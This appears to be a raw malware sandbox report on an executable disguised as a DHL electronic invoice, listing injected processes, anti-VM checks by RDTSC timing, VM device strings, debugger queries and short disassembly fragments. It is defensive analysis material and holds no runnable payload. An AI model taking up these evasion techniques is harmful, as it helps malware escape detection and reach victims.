Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7472, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002D09904 second address: 0000000002D0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000002D09B6E second address: 0000000002D09B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 29E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 7760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 8760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 8910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Memory allocated: 9910000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6859	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1823	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2368	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7567	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 879	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 865	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 1550	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Window / User API: threadDelayed 8420	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13943

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\systray.exe	API coverage: 1.9 %

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6064	Thread sleep count: 2368 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6064	Thread sleep time: -4736000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6064	Thread sleep count: 7567 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6064	Thread sleep time: -15134000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 8068	Thread sleep count: 1550 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 8068	Thread sleep time: -3100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 8068	Thread sleep count: 8420 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 8068	Thread sleep time: -16840000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000006.00000002.3890474944.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 00000006.00000000.1472350042.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.3891064279.0000000009290000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000006.00000000.1481090991.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 00000006.00000000.1472350042.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 00000006.00000000.1481090991.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3891064279.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077349116.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000002.3890474944.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2284484234.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.1472350042.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000000.1481090991.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.3891064279.0000000009290000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000006.00000000.1472350042.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Code function: 5_2_0040ACE0 LdrLoadDll,

5_2_0040ACE0

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]	5_2_019C019F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]	5_2_019C019F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]	5_2_019C019F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C019F mov eax, dword ptr fs:[00000030h]	5_2_019C019F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]	5_2_0193A197
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]	5_2_0193A197
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h]	5_2_0193A197
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019FC188 mov eax, dword ptr fs:[00000030h]	5_2_019FC188
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019FC188 mov eax, dword ptr fs:[00000030h]	5_2_019FC188
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01980185 mov eax, dword ptr fs:[00000030h]	5_2_01980185
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E4180 mov eax, dword ptr fs:[00000030h]	5_2_019E4180
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E4180 mov eax, dword ptr fs:[00000030h]	5_2_019E4180
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A161E5 mov eax, dword ptr fs:[00000030h]	5_2_01A161E5
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	5_2_019BE1D0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	5_2_019BE1D0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BE1D0 mov ecx, dword ptr fs:[00000030h]	5_2_019BE1D0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	5_2_019BE1D0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	5_2_019BE1D0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A061C3 mov eax, dword ptr fs:[00000030h]	5_2_01A061C3
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A061C3 mov eax, dword ptr fs:[00000030h]	5_2_01A061C3
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019701F8 mov eax, dword ptr fs:[00000030h]	5_2_019701F8
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EA118 mov ecx, dword ptr fs:[00000030h]	5_2_019EA118
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]	5_2_019EA118
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]	5_2_019EA118
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h]	5_2_019EA118
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h]	5_2_019EE10E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01970124 mov eax, dword ptr fs:[00000030h]	5_2_01970124
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A00115 mov eax, dword ptr fs:[00000030h]	5_2_01A00115
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946154 mov eax, dword ptr fs:[00000030h]	5_2_01946154
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01946154 mov eax, dword ptr fs:[00000030h]	5_2_01946154
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193C156 mov eax, dword ptr fs:[00000030h]	5_2_0193C156
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D8158 mov eax, dword ptr fs:[00000030h]	5_2_019D8158
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h]	5_2_019D4144
